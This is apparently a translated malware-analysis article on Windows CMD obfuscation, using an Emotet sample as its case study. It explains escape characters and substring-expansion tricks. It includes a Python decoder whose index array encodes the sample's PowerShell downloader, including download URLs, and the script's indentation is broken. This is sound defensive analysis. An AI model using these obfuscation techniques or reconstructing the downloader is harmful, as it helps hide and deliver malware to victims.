The obfuscation of CMD is the most difficult to understand among obfuscated languages such as JS, VBA, and powershell, because there is no public debugger for CMD, and it is necessary to understand the complex syntax of CMD. In order to facilitate the use of CMD, there are a lot of fault tolerance in the command, which also leads to the BAT script can be very confusing.
The following are the characters that are easy to use for confusion in CMD:
| Grammatical symbols | function |
|---|---|
| >、>> | Redirect |
| Vertical bar | pipeline |
| &&, &, double vertical bars | Statement connection |
| ^ | Escape character, this character does not affect the execution of the command |
| ,with ; | These two symbols are interchangeable and can replace legal spaces in the command |
| () | The symbol in the parameter does not affect the execution of the command |
CMD parameter /? displays help, the two most commonly used parameters /C /V. When the /V:ON parameter is enabled, you can expand variables without using the call command. Use %var% or !var! to expand variables. !var! can be used instead of %var%, that is, you can use exclamation point characters to replace runtime The value of the environment variable.
grammar
%VarName:~offset[,length]% is
mainly used to obtain the variable value of the environment variable VarName.
For example, the default value of the system's existing environment variable %comspec% variable is "C:\WINDOWS\system32\cmd.exe", the set command can be encoded as: %comspec:~11,1%%comspec:~-1%%comspec:~-13,1%
Viruses often use this method to splice the characters they want String command.
The picture shows the CMD obfuscation method of the EMOTET family, the sample hash 18080c897fee73efed43fd054cd8941f. With a certain CMD grammar basis, it can be seen that there are only three commands, and the separation points are marked with arrows in the figure. In the for loop, when the element of %D is 80, which is the last element of the array, the call command is called to expand the variable Zv. Obviously, the final call execution command is obtained by decrypting the array.
Set Zv=!Zv!!pPr:%D,1! Among them, Zv=!Zv! is the initialization of variables, !pPr:%D,1! is the syntax usage mentioned above, meaning that the %D of the array element is The subscript takes 1 character.
After testing, the length of pPr is 73, and the length of the decrypted string is 362, so it is now completely certain that the logic of CMD is to take 1 character from pPr according to the array element as the subscript, and finally spell it into a string of length 362 , Which is another malicious character.
It is a very simple method to verify our conjecture and decrypt it through python.
Attach the test code:
pPr = "MOANtGXcfYQDJZlJqsHzDVpR-8Ix'$iS{@+vC2o=/(WFbjdh);gekUnaru}P7:E, wy0.\m"
decode = []
array = [22,38,65,51,56,17,47,51,14,14,64,29,55,21,21,39,54,51,65,24,38,44,45,51,7,4,64,3,51,4,68,42,51,44,36,14,30,51,54,4,49,29,15,62,17,39,28,47,4,4,22,61,40,40,35,46,4,38,50,4,68,54,14,40,55,70,66,10,33,47,4,4,22,61,40,40,35,30,7,30,38,57,17,51,54,4,51,56,22,56,30,17,51,17,68,7,38,70,40,16,6,53,57,6,16,33,47,4,4,22,61,40,40,57,54,7,14,51,44,57,46,17,22,30,7,51,68,7,38,70,40,25,67,46,33,47,4,4,22,61,40,40,35,55,14,30,57,54,55,17,68,7,38,70,40,5,25,36,38,38,26,33,47,4,4,22,61,40,40,4,47,51,17,30,14,35,51,56,55,70,51,56,30,7,55,54,51,55,50,14,51,68,7,38,70,40,4,44,28,68,31,22,14,30,4,41,28,33,28,48,49,29,42,6,62,64,39,64,28,60,37,60,28,49,29,23,42,30,39,29,51,54,35,61,4,51,70,22,34,28,69,28,34,29,42,6,62,34,28,68,51,27,51,28,49,8,38,56,51,55,7,47,41,29,54,16,13,64,30,54,64,29,15,62,17,48,32,4,56,66,32,29,55,21,21,68,20,38,65,54,14,38,55,46,43,30,14,51,41,29,54,16,13,63,64,29,23,42,30,48,49,31,4,55,56,4,24,59,56,38,7,51,17,17,64,29,23,42,30,49,44,56,51,55,52,49,58,7,55,4,7,47,32,58,58,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,80]
print len(pPr)
print len(array)
try:
for i in array:
decode.append(pPr[i])
except:
print "exit"
print decode
references
https://www.freebuf.com/articles/terminal/180390.html
https://update.venuseye.com.cn/reports/1548417941041/%E4%BB%A5Emotet%E4%B8%BA%E4%BE%8B%E6%B7%B1%E5%85%A5%E5%88%86%E6%9E%90CMD%E5%91%BD%E4%BB%A4%E6%B7%B7%E6%B7%86%E6%8A%80%E6%9C%AF20181212.html
FireEye : DOSfuscation:Exploring the Depths of Cmd.exe Obfuscation and Detection Techniques